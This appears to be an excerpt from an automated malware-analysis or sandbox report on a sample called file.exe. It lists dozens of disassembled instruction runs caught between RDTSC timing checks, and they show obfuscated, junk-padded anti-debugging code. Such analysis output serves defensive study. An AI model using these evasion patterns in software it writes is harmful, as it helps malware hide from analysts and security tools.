Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB01DC second address: 4EB0261 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 08A6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d call 00007F86A0EA8103h 0x00000012 pushfd 0x00000013 jmp 00007F86A0EA8108h 0x00000018 add ax, A978h 0x0000001d jmp 00007F86A0EA80FBh 0x00000022 popfd 0x00000023 pop esi 0x00000024 pushfd 0x00000025 jmp 00007F86A0EA8109h 0x0000002a and esi, 2905DA16h 0x00000030 jmp 00007F86A0EA8101h 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0261 second address: 4EB0274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0274 second address: 4EB027A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB027A second address: 4EB027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB027E second address: 4EB029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cl, E6h 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F86A0EA80FEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB029C second address: 4EB02C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F86A1919480h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB02C0 second address: 4EB02CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB02CF second address: 4EB0343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F86A1919481h 0x0000000f xchg eax, esi 0x00000010 jmp 00007F86A191947Eh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov esi, edx 0x0000001b pushfd 0x0000001c jmp 00007F86A1919489h 0x00000021 and ah, 00000006h 0x00000024 jmp 00007F86A1919481h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0343 second address: 4EB036D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 35h 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e mov bx, cx 0x00000011 pop eax 0x00000012 mov bx, CC3Eh 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F86A0EA8100h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB036D second address: 4EB03C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F86A1919487h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [769B4538h] 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 jmp 00007F86A1919480h 0x0000001b popad 0x0000001c xor dword ptr [ebp-08h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F86A1919487h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB03C2 second address: 4EB03DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A0EA8104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB03DA second address: 4EB03F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F86A1919483h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB03F9 second address: 4EB0411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A0EA8104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0411 second address: 4EB0440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F86A1919486h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0440 second address: 4EB0444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0444 second address: 4EB0448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0448 second address: 4EB044E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB044E second address: 4EB0570 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F86A1919486h 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 jmp 00007F86A1919480h 0x00000017 mov dword ptr fs:[00000000h], eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F86A191947Eh 0x00000024 or ax, F908h 0x00000029 jmp 00007F86A191947Bh 0x0000002e popfd 0x0000002f mov ax, D37Fh 0x00000033 popad 0x00000034 mov dword ptr [ebp-18h], esp 0x00000037 pushad 0x00000038 jmp 00007F86A1919487h 0x0000003d popad 0x0000003e mov eax, dword ptr fs:[00000018h] 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F86A1919480h 0x0000004b adc esi, 089CEDC8h 0x00000051 jmp 00007F86A191947Bh 0x00000056 popfd 0x00000057 popad 0x00000058 mov ecx, dword ptr [eax+00000FDCh] 0x0000005e pushad 0x0000005f pushfd 0x00000060 jmp 00007F86A1919484h 0x00000065 sbb cx, F028h 0x0000006a jmp 00007F86A191947Bh 0x0000006f popfd 0x00000070 pushfd 0x00000071 jmp 00007F86A1919488h 0x00000076 or eax, 2F59A288h 0x0000007c jmp 00007F86A191947Bh 0x00000081 popfd 0x00000082 popad 0x00000083 test ecx, ecx 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F86A1919485h 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0570 second address: 4EB059A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F86A0EA813Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F86A0EA80FDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB059A second address: 4EB05A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB05A0 second address: 4EB05A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB05A4 second address: 4EB05C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ah, dl 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB05C5 second address: 4EB05DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 65B5h 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, dword ptr [ebp+08h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dh, cl 0x00000015 movsx edx, ax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA024D second address: 4EA0253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0253 second address: 4EA02D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov edi, eax 0x00000011 pushfd 0x00000012 jmp 00007F86A0EA80FAh 0x00000017 sub si, 4EF8h 0x0000001c jmp 00007F86A0EA80FBh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F86A0EA8106h 0x0000002a sub esp, 2Ch 0x0000002d jmp 00007F86A0EA8100h 0x00000032 xchg eax, ebx 0x00000033 jmp 00007F86A0EA8100h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F86A0EA80FDh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA02D8 second address: 4EA02ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA02ED second address: 4EA02F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA03A1 second address: 4EA0475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F86A1919487h 0x00000009 add eax, 6489BDBEh 0x0000000f jmp 00007F86A1919489h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F86A1919480h 0x0000001b sbb ecx, 2BACC6B8h 0x00000021 jmp 00007F86A191947Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a sub edi, edi 0x0000002c pushad 0x0000002d mov ecx, ebx 0x0000002f mov edi, 156B6094h 0x00000034 popad 0x00000035 inc ebx 0x00000036 pushad 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F86A191947Fh 0x0000003e sub ah, 0000002Eh 0x00000041 jmp 00007F86A1919489h 0x00000046 popfd 0x00000047 mov ah, C3h 0x00000049 popad 0x0000004a pushfd 0x0000004b jmp 00007F86A191947Dh 0x00000050 or ch, 00000066h 0x00000053 jmp 00007F86A1919481h 0x00000058 popfd 0x00000059 popad 0x0000005a test al, al 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F86A191947Dh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0475 second address: 4EA0485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86A0EA80FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA04F7 second address: 4EA0506 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0506 second address: 4EA0529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F86A0EA8106h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0529 second address: 4EA052D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA052D second address: 4EA0533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0533 second address: 4EA054F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F86A1919480h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0634 second address: 4EA063A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA063A second address: 4EA063E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA063E second address: 4EA0690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e mov edi, 33A59FCCh 0x00000013 popad 0x00000014 lea eax, dword ptr [ebp-2Ch] 0x00000017 pushad 0x00000018 mov ax, di 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F86A0EA8103h 0x00000022 add eax, 34D22E7Eh 0x00000028 jmp 00007F86A0EA8109h 0x0000002d popfd 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0690 second address: 4EA06FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 jmp 00007F86A191947Ch 0x0000000c push eax 0x0000000d jmp 00007F86A191947Bh 0x00000012 xchg eax, esi 0x00000013 jmp 00007F86A1919486h 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F86A191947Ch 0x00000021 add si, BB08h 0x00000026 jmp 00007F86A191947Bh 0x0000002b popfd 0x0000002c push eax 0x0000002d pop edi 0x0000002e popad 0x0000002f mov ecx, 7891329Bh 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F86A191947Ch 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA06FF second address: 4EA0717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0717 second address: 4EA071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA071C second address: 4EA0722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0722 second address: 4EA0761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919485h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F86A191947Eh 0x00000011 push eax 0x00000012 jmp 00007F86A191947Bh 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, ax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0761 second address: 4EA0766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0766 second address: 4EA076C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA07A5 second address: 4E90EBD instructions: 0x00000000 rdtsc 0x00000002 mov cx, 6EDFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f mov ecx, 437FCD73h 0x00000014 popad 0x00000015 test esi, esi 0x00000017 jmp 00007F86A0EA8106h 0x0000001c je 00007F8712965F79h 0x00000022 xor eax, eax 0x00000024 jmp 00007F86A0E8182Ah 0x00000029 pop esi 0x0000002a pop edi 0x0000002b pop ebx 0x0000002c leave 0x0000002d retn 0004h 0x00000030 nop 0x00000031 cmp eax, 00000000h 0x00000034 setne cl 0x00000037 xor ebx, ebx 0x00000039 test cl, 00000001h 0x0000003c jne 00007F86A0EA80F7h 0x0000003e jmp 00007F86A0EA826Bh 0x00000043 call 00007F86A5AC224Ah 0x00000048 mov edi, edi 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90EBD second address: 4E90EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90EC1 second address: 4E90ED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90ED9 second address: 4E90F06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F86A1919486h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90F06 second address: 4E90F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90F0A second address: 4E90F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90F10 second address: 4E90F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90F16 second address: 4E90F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90F1A second address: 4E90F5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F86A0EA80FDh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 movzx eax, di 0x00000014 mov ecx, edx 0x00000016 popad 0x00000017 push ebp 0x00000018 jmp 00007F86A0EA8100h 0x0000001d mov dword ptr [esp], ecx 0x00000020 pushad 0x00000021 call 00007F86A0EA80FEh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90F8C second address: 4E90FA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919487h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90FA7 second address: 4EA0C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov edx, ecx 0x0000000d jmp 00007F86A0EA8108h 0x00000012 popad 0x00000013 ret 0x00000014 nop 0x00000015 and bl, 00000001h 0x00000018 movzx eax, bl 0x0000001b lea esp, dword ptr [ebp-0Ch] 0x0000001e pop esi 0x0000001f pop edi 0x00000020 pop ebx 0x00000021 pop ebp 0x00000022 ret 0x00000023 add esp, 04h 0x00000026 jmp dword ptr [0028A41Ch+ebx*4] 0x0000002d push edi 0x0000002e call 00007F86A0ECDAF7h 0x00000033 push ebp 0x00000034 push ebx 0x00000035 push edi 0x00000036 push esi 0x00000037 sub esp, 000001D0h 0x0000003d mov dword ptr [esp+000001B4h], 0028CB10h 0x00000048 mov dword ptr [esp+000001B0h], 000000D0h 0x00000053 mov dword ptr [esp], 00000000h 0x0000005a mov eax, dword ptr [002881DCh] 0x0000005f call eax 0x00000061 mov edi, edi 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F86A0EA8109h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0C87 second address: 4EA0C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0C8C second address: 4EA0C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0C9B second address: 4EA0C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0C9F second address: 4EA0D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F86A0EA80FEh 0x0000000c adc eax, 36BD2548h 0x00000012 jmp 00007F86A0EA80FBh 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 mov dx, si 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007F86A0EA80FAh 0x0000002b cmp dword ptr [769B459Ch], 05h 0x00000032 jmp 00007F86A0EA8100h 0x00000037 je 00007F8712955E00h 0x0000003d jmp 00007F86A0EA8100h 0x00000042 pop ebp 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F86A0EA8107h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0D25 second address: 4EA0D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0D2B second address: 4EA0D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0D67 second address: 4EA0D6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0D6D second address: 4EA0DBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 42282029h 0x00000010 jmp 00007F86A0EA8106h 0x00000015 call 00007F871295CEC7h 0x0000001a push 76952B70h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov eax, dword ptr [esp+10h] 0x0000002a mov dword ptr [esp+10h], ebp 0x0000002e lea ebp, dword ptr [esp+10h] 0x00000032 sub esp, eax 0x00000034 push ebx 0x00000035 push esi 0x00000036 push edi 0x00000037 mov eax, dword ptr [769B4538h] 0x0000003c xor dword ptr [ebp-04h], eax 0x0000003f xor eax, ebp 0x00000041 push eax 0x00000042 mov dword ptr [ebp-18h], esp 0x00000045 push dword ptr [ebp-08h] 0x00000048 mov eax, dword ptr [ebp-04h] 0x0000004b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000052 mov dword ptr [ebp-08h], eax 0x00000055 lea eax, dword ptr [ebp-10h] 0x00000058 mov dword ptr fs:[00000000h], eax 0x0000005e ret 0x0000005f pushad 0x00000060 mov al, EFh 0x00000062 push ebx 0x00000063 mov cx, 2FA5h 0x00000067 pop ecx 0x00000068 popad 0x00000069 mov esi, 00000000h 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 popad 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0DBB second address: 4EA0DBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0DBF second address: 4EA0DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0DC5 second address: 4EA0DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0DCB second address: 4EA0DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC072A second address: 4EC0730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0730 second address: 4EC0734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0734 second address: 4EC0740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
